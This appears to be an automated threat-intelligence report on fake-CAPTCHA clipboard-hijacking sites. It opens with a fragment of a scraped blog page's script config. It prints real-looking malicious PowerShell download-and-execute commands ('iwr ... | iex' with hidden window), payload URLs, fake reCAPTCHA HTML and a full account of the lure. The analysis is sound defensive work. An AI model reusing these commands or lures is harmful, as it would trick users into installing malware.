'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': true, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/f28b5561d9d56e0d', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Share to X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\\x3cscript type\\x3d\\x22text/javascript\\x22\\x3ewindow.___gcfg \\x3d {\\x27lang\\x27: \\x27en\\x27};\\x3c/script\\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'index', 'pageName': '', 'pageTitle': 'staplebrokenmetal'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': true, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\\x3dtimeslide'}, 'isMobile': false, 'title': 'staplebrokenmetal', 'description': '', 'url': 'https://staplebrokenmetaliyro.blogspot.com/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': true, 'isArchive': false, 'isLabelSearch': false}}, {'name': 'widgets', 'data': [{'title': 'Search This Blog', 'type': 'BlogSearch', 'sectionId': 'search_top', 'id': 'BlogSearch1'}, {'title': 'staplebrokenmetal (Header)', 'type': 'Header', 'sectionId': 'header', 'id': 'Header1'}, {'title': 'Blog Posts', 'type': 'Blog', 'sectionId': 'page_body', 'id': 'Blog1', 'posts': [], 'headerByline': {'regionName': 'header1', 'items': [{'name': 'share', 'label': ''}, {'name': 'timestamp', 'label': ''}]}, 'footerBylines': [{'regionName': 'footer1', 'items': [{'name': 'comments', 'label': 'comments'}, {'name': 'icons', 'label': ''}]}, {'regionName': 'footer2', 'items': [{'name': 'labels', 'label': ''}]}, {'regionName': 'footer3', 'items': [{'name': 'location', 'label': 'Location:'}]}], 'allBylineItems': [{'name': 'share', 'label': ''}, {'name': 'timestamp', 'label': ''}, {'name': 'comments', 'label': 'comments'}, {'name': 'icons', 'label': ''}, {'name': 'labels', 'label': ''}, {'name': 'location', 'label': 'Location:'}]}, {'title': '', 'type': 'PopularPosts', 'sectionId': 'page_body', 'id': 'PopularPosts1', 'posts': []}, {'type': 'Attribution', 'sectionId': 'footer', 'id': 'Attribution1'}, {'title': 'About Me', 'type': 'Profile', 'sectionId': 'sidebar_top', 'id': 'Profile1'}, {'title': '', 'type': 'ReportAbuse', 'sectionId': 'sidebar_bottom', 'id': 'ReportAbuse1'}]}]);\n_WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'search_top', document.getElementById('BlogSearch1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'page_body', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'navMessage': 'No posts.', 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/349593359-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css'}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_PopularPostsView', new _WidgetInfo('PopularPosts1', 'page_body', document.getElementById('PopularPosts1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'footer', document.getElementById('Attribution1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'sidebar_top', document.getElementById('Profile1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_ReportAbuseView', new _WidgetInfo('ReportAbuse1', 'sidebar_bottom', document.getElementById('ReportAbuse1'), {}, 'displayModeFull'));\n</script>\n</body>\n</html>",
"ThreatLevel": "High"
}
Technical Analysis
ClickGrab Threat Analysis Report - 2025-04-27
Most Common External Domains
- www.google.com: 26 occurrences
- use.fontawesome.com: 17 occurrences
- staplebrokenmetaliyro.blogspot.com: 15 occurrences
- cdnjs.cloudflare.com: 14 occurrences
- www.blogger.com: 13 occurrences
- www.webgo.de: 10 occurrences
- www.w3.org: 6 occurrences
- t.me: 5 occurrences
- browser.certif-update.website: 4 occurrences
- www.blogblog.com: 2 occurrences
Common Pattern Analysis
reCAPTCHA imagery (17 occurrences, 1 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (17 times)
Font resources (31 occurrences, 2 distinct URLs)
- https://use.fontawesome.com/releases/v5.0.0/css/all.css (17 times)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (14 times)
CDN hosted scripts (15 occurrences, 2 distinct URLs)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (14 times)
- https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
Google resources (28 occurrences, 8 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (17 times)
- https://www.google.com/intl/en/policies/privacy/ (3 times)
- https://www.google.com/intl/en/policies/terms/ (3 times)
- http://www.google.com/2005/gml/b (1 times)
- http://www.google.com/2005/gml/data (1 times)
- ...and 3 more distinct URLs
JavaScript Clipboard Analysis
Found clipboard manipulation code snippets in 34 places
document.execCommand copy
Found in 34 snippets (100.0% of clipboard code)
Examples:
document.execCommand("copy")
textarea manipulation
Found in 34 snippets (100.0% of clipboard code)
Fake CAPTCHA HTML Examples
Here's how the fake CAPTCHA verification appears in HTML:
Example 1:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Example 2:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Command Context Analysis
Found 20 PowerShell download context snippets
stageClipboard Function
Found 14 references to stageClipboard function
Example stageClipboard contexts:
Example 1:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 2:
...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 3:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Malicious Commands
Found 3 commandToRun declarations
Malicious commands being prepared for clipboard:
Example 1:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 2:
Command:
powershell
Context:
...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 3:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
PowerShell Parameters
Found 2 htaPath declarations
Malicious PowerShell parameters:
Example 1:
Parameters:
-w hidden -c \
Context:
...d; const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaP
Example 2:
Parameters:
-w hidden -c \
Context:
...const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
Clipboard Attack Pattern Analysis
Based on the data analyzed, here's the complete clipboard attack pattern:
1. Initial Victim Engagement
Victim is shown a fake CAPTCHA verification UI with Google reCAPTCHA branding
Common elements found: - Google reCAPTCHA logo image - Font resources from CDNs - "I am not a robot" checkbox
Example Fake CAPTCHA HTML:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>...
2. Malicious Code Preparation
When user clicks the verification checkbox:
- A 'commandToRun' variable is set with a malicious PowerShell command
- The command is typically obfuscated and often downloads second-stage payloads
- Common download destinations include:
Example Command Preparation Code:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
3. Clipboard Hijacking
The malicious command is copied to the user's clipboard:
- A temporary textarea element is created
- The command is combined with verification text like "[CHECKMARK] I am not a robot"
- document.execCommand("copy") is used to copy to clipboard
- The temporary element is removed from the DOM
4. Social Engineering Component
User sees a success message:
- The verification UI shows success with a checkmark symbol
- User is told they've passed verification
- The clipboard now contains the malicious command + verification text
5. Attack Objective
Final stage of the attack:
- When user pastes the clipboard contents elsewhere (like in terminal)
- They see what looks like verification text
- But the PowerShell command at the start gets executed
- This downloads and runs additional malware from attacker-controlled servers
Reconstructed Attack Example
What's copied to clipboard:
powershell # [CHECKMARK] 'I am not a robot - reCAPTCHA Verification Hash: XY12Z345'
What user sees when pasting: A verification success message
What actually happens: PowerShell executes the hidden malicious command
Conclusion
This is a sophisticated social engineering attack that tricks users into:
- Thinking they're completing a legitimate CAPTCHA
- Unknowingly copying malicious code to their clipboard
- Executing malware when they paste what they think is just verification text
Statistics
- Total sites analyzed: 29
- Sites with malicious content: 17
- Total unique domains: 18
- Total URLs extracted: 121